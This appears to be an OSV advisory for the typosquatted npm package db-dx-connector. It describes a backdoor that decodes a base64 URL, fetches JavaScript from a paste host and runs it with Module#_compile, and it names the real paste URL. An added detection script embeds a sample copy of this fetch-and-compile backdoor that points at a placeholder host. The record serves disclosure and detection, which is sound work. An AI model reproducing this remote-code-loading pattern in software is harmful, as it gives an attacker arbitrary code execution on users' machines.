MAL-2026-5463

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-dx-connector/MAL-2026-5463.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5463
Published
2026-06-09T20:18:26Z
Modified
2026-06-26T19:01:38.628262410Z
Summary
Malicious code in db-dx-connector (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759)

The package name db-dx-connector inverts the word order of the legitimate dx-db-connector package (whose own GitHub URL github.com/divbloxjs/dx-db-connector is referenced in this package's metadata). It replicates the legitimate package's MySQL-connector API surface and adds an undocumented method queryDBConnect in index.js (lines 226-238) that constitutes a backdoor: a base64-encoded URL stored in a misleadingly named HASH_KEY constant decodes to https://www.jsonkeeper.com/b/ZIAIK (an anonymous, mutable paste-hosting service), the method fetches .data.content from that URL via axios, constructs a synthetic Node module, and calls m._compile(s1, 'error.js') to execute the fetched JavaScript inside the consumer's Node process. Errors are silently swallowed in a try/catch. Whoever controls the paste can ship arbitrary code into any process that calls queryDBConnect(). The combination of name inversion against a real package, base64 URL obfuscation, anonymous attacker-controlled host, runtime fetch+compile of remote JavaScript, and silent error suppression is an unambiguous remote-code-execution backdoor.
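As an added illustration (not part of the advisory, the OSV record, or either package's code), a small JavaScript static heuristic that flags the pattern described above in a package's source: a quoted base64 literal that decodes to an http(s) URL, a runtime network fetch, a call to Module#_compile, and an empty catch. The sample it scans is constructed here and uses a placeholder URL, not the real paste URL from the advisory.

```javascript
// Added example: static heuristic for the fetch-and-_compile backdoor pattern.
// Heuristics only; a hit is a reason to read the file, not proof by itself.
const COMPILE_RE = /\b_compile\s*\(/;
const FETCH_RE = /\b(axios\.(get|post|request)|fetch\s*\(|https?\.get\s*\()/;
const EMPTY_CATCH_RE = /catch\s*(\([^)]*\))?\s*\{\s*\}/;
const BASE64_LITERAL_RE = /['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g;

// Return every quoted base64 literal in `source` that decodes to an http(s) URL.
function decodeBase64Urls(source) {
  const urls = [];
  for (const m of source.matchAll(BASE64_LITERAL_RE)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// Scan one JavaScript source string and report which indicators are present.
// `suspicious` is true only when an encoded URL and a _compile call co-occur,
// which is the combination the advisory describes.
function scanForRemoteCompile(source) {
  const urls = decodeBase64Urls(source);
  const findings = [];
  if (urls.length) findings.push(`base64 literal decodes to URL: ${urls.join(', ')}`);
  if (FETCH_RE.test(source)) findings.push('runtime network fetch');
  if (COMPILE_RE.test(source)) findings.push('Module#_compile on a runtime string');
  if (EMPTY_CATCH_RE.test(source)) findings.push('errors silently swallowed');
  return { urls, findings, suspicious: urls.length > 0 && COMPILE_RE.test(source) };
}

// Constructed sample mimicking the described index.js; the URL is a placeholder,
// not the real one from the advisory.
const SAMPLE_SOURCE = `
const axios = require('axios');
const Module = require('module');
const HASH_KEY = '${Buffer.from('https://paste.example.invalid/b/PLACEHOLDER').toString('base64')}';
async function queryDBConnect() {
  try {
    const r = await axios.get(Buffer.from(HASH_KEY, 'base64').toString());
    const m = new Module('x');
    m._compile(r.data.content, 'error.js');
  } catch (e) {}
}
`;

console.log(scanForRemoteCompile(SAMPLE_SOURCE));
```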

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.0"
            ],
            "sha256": "6eeeef7d309b24e00c0e45df8736d1d8b8d279207d2bfa766c75890815e5382d",
            "modified_time": "2026-06-09T20:18:26Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005190",
            "import_time": "2026-06-09T20:45:50.787271159Z"
        },
        {
            "versions": [
                "1.0.1"
            ],
            "sha256": "b0a6cd3a84c38e801823eba4ccf0d4ff2a28f5955309bfb300f7f0f640b1a69b",
            "modified_time": "2026-06-16T22:47:12Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006858",
            "import_time": "2026-06-16T23:03:44.318776268Z"
        },
        {
            "versions": [
                "1.0.2"
            ],
            "sha256": "ee8717a253384a26fdaea14cf33003127a3ab77c8ec5cc28e93f73ba79d3e0f9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-18T19:08:47Z",
            "import_time": "2026-06-18T19:20:02.780433786Z",
            "id": "IN-MAL-2026-007023"
        },
        {
            "versions": [
                "1.0.3"
            ],
            "sha256": "074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759",
            "modified_time": "2026-06-26T18:12:40Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T18:42:49.694195222Z",
            "id": "IN-MAL-2026-007650"
        }
    ]
}
References
Credits

Affected packages

npm / db-dx-connector

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.3

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "db-dx-connector-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-xxK01exWEJD1dj5iX/S23WoZ/RT1QH4y+6yDysyyrsXn0tZg3ut2RK5vHZtS1cgnImaHWYiMJXeEUSOZGLBnJg==",
                "sha1": "4621c8f4e81dda030638bbdd54dbca0407770454"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "7e8b618753db019263d7d472f0ca2a1561c428cc7dae515032d9677bb5d4d892",
            "path": "index.js",
            "tlsh": "d672300637f72527017b7068a6cb5080a439f41b2b35d860be5cc6715fa87b8bda37d8"
        },
        {
            "sha256": "a3b56e8adb7dfc3d892216b7d548536f6c19e2917c23b1757ac95b1c69d4c8d5",
            "path": "package.json",
            "tlsh": "32016835c9201ca316ab36984c555105b12190ebcf08ed4477cc116ccf6e29b22ae3ae"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-dx-connector/MAL-2026-5463.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]